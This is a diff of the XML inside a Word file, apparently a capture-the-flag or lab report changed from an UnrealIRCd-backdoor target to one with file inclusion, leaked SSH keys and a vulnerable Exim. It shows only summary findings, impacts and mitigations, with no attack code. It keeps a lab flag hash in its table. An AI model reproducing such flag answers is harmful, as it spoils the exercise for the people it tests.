+            <wp:docPr id="1684376710" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -8423,11 +8826,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="75862612" name=""/>
+                    <pic:cNvPr id="1684376710" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
+                    <a:blip r:embed="rId27"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -8435,7 +8838,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5361905" cy="3257143"/>
+                      <a:ext cx="4323809" cy="4980952"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -8450,49 +8853,55 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Flags Captured Summary</w:t>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Flags Summary</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblW w:w="5152" w:type="dxa"/>
         <w:tblCellSpacing w:w="15" w:type="dxa"/>
         <w:tblBorders>
           <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
@@ -8511,11 +8920,12 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1049"/>
-        <w:gridCol w:w="3882"/>
+        <w:gridCol w:w="1140"/>
+        <w:gridCol w:w="4012"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
+          <w:trHeight w:val="449"/>
           <w:tblHeader/>
           <w:tblCellSpacing w:w="15" w:type="dxa"/>
         </w:trPr>
@@ -8586,69 +8996,7 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
-            <w:hideMark/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-              <w:t>User Flag</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
-            <w:hideMark/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-              <w:t>c53c08b5bf2b0801c5d0c24149826a6e</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
+          <w:trHeight w:val="449"/>
           <w:tblCellSpacing w:w="15" w:type="dxa"/>
         </w:trPr>
         <w:tc>
@@ -8705,7 +9053,7 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>ab28c8ca8da1b9ffc2d702ac54221105</w:t>
+              <w:t>Congratulations you found the flag</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8725,28 +9073,45 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -8756,14 +9121,11 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="2"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -8774,188 +9136,105 @@
           <w:b/>
           <w:bCs/>
           <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>IRC Backdoor Vulnerability</w:t>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>• Local File Inclusion (LFI)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• Exposed backup files</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• Weak file permissions</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• SSH key leakage</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• Vulnerable Exim version</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>The UnrealIRCd service was running a compromised version containing a backdoor.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Lack of Service Hardening</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Critical services were exposed without proper patching.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Weak Privilege Separation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>User was able to escalate privileges easily to root.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
         <w:t>Impact</w:t>
       </w:r>
     </w:p>
@@ -8976,7 +9255,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>These vulnerabilities allowed an attacker to:</w:t>
+        <w:t>An attacker can:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8996,7 +9275,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>• Exploit a backdoored service</w:t>
+        <w:t>• Access sensitive files</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9006,7 +9285,17 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Gain remote shell access</w:t>
+        <w:t>• Extract private SSH keys</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• Gain unauthorized access</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9031,44 +9320,50 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Mitigation Recommendations</w:t>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Mitigation</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9088,7 +9383,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>• Update vulnerable services regularly</w:t>
+        <w:t>• Patch Exim vulnerability</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9098,7 +9393,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Avoid using backdoored or outdated software</w:t>
+        <w:t>• Disable directory listing</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9108,7 +9403,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Restrict unnecessary open ports</w:t>
+        <w:t>• Secure backup storage</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9118,7 +9413,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Implement proper access controls</w:t>
+        <w:t>• Restrict file permissions</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9128,57 +9423,71 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t xml:space="preserve">• Monitor unusual service </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>actions</w:t>
+        <w:t>• Validate user inputs (prevent LFI)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
